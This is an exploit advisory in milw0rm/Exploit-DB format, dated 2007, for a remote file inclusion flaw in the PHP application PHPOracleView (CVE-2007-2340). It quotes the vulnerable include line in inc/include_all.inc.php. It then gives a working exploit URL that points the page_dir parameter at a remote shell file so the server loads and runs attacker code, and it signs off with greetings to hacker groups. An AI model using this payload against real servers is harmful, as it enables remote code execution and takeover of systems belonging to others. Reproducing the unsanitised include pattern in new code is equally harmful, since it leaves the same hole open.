PHPOracleView - 'include_all.inc.php?page_dir' Remote File Inclusion

Author: Alkomandoz Hacker
type: webapps
platform: php
port: 
date_added: 2007-04-25 
date_updated:  
verified: 1 
codes: OSVDB-34300;CVE-2007-2340 
tags: 
aliases:  
screenshot_url:  
application_url: 

===============================
phporacleview =>  (page_dir) Remote File Inclusion Exploit
===============================

Discoverd By : Alkomandoz Hacker


HomePge= Asb-May.Net & Mohandko.com & Sniper-sa.com & Tryag.com

================================

Script Name: phporacleview

Download Script: http://webxadmin.free.fr/download/phporacleview.zip


=================================
Bug in :

phporacleview/inc/include_all.inc.php

=======

<?
include($page_dir . $inc_dir . "config.inc.php");

==================================


Exploit :
--------------------------------

http://localhost/phporacleview/inc/include_all.inc.php?page_dir=http://Shell.txt?

===================================

GreetZ : AsbMay's Groups & City Of Ghosts Team & Sniper-sa TeAm

# milw0rm.com [2007-04-26]